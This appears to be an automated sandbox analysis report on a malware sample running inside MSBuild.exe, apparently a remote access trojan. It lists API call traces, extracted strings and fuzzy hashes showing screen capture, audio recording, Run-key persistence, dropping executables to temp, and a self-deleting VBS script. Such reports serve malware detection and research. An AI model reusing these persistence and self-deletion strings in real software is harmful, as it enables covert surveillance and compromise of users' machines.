                                                                                                                                                                                    • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                    • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                                                                                    • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                                                                                      • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                                                                                                                    • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                                                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                                                                    • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                                    • API String ID: 1352755160-865373369
                                                                                                                                                                                    • Opcode ID: cbbf896b03214424dbec6bf0bb467f1930cc53c9a426e4046c46faf51280246d
                                                                                                                                                                                    • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: cbbf896b03214424dbec6bf0bb467f1930cc53c9a426e4046c46faf51280246d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                                      • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                      • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                      • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                      • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                      • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                                      • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                                                                      • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                                                                      • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                                      • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                                                    • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                                                    • API String ID: 4250697656-2665858469
                                                                                                                                                                                    • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                                                                    • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                                                                    • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                                                                    • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000,?,00000000), ref: 0040C38B
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000), ref: 0040C3E7
                                                                                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                      • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                    • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                    • API String ID: 1861856835-3168347843
                                                                                                                                                                                    • Opcode ID: 71c630b62355bd2345be6ef92b837db7c6a10e53b0b8239ea959b12e0ac3d39c
                                                                                                                                                                                    • Instruction ID: 43bf65a1236aaa08726e8ba1b2561aed97fca96c1d26920a01593f416fdc4598
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71c630b62355bd2345be6ef92b837db7c6a10e53b0b8239ea959b12e0ac3d39c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D9174312042005AC314FB25D852ABF7799AF91708F10453FF58AA31E2EF7CAD49869E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                      • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                      • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                      • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                    • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                    • API String ID: 3797177996-1998216422
                                                                                                                                                                                    • Opcode ID: d60b2599d57a11e7628afaf08605114e6dbdd8ff5cc87fa28741f108f7a6499c
                                                                                                                                                                                    • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: d60b2599d57a11e7628afaf08605114e6dbdd8ff5cc87fa28741f108f7a6499c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                    • API String ID: 738084811-1408154895
                                                                                                                                                                                    • Opcode ID: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
                                                                                                                                                                                    • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Write$Create
                                                                                                                                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                    • API String ID: 1602526932-4212202414
                                                                                                                                                                                    • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                    • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                    • API String ID: 1646373207-89630625
                                                                                                                                                                                    • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                    • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
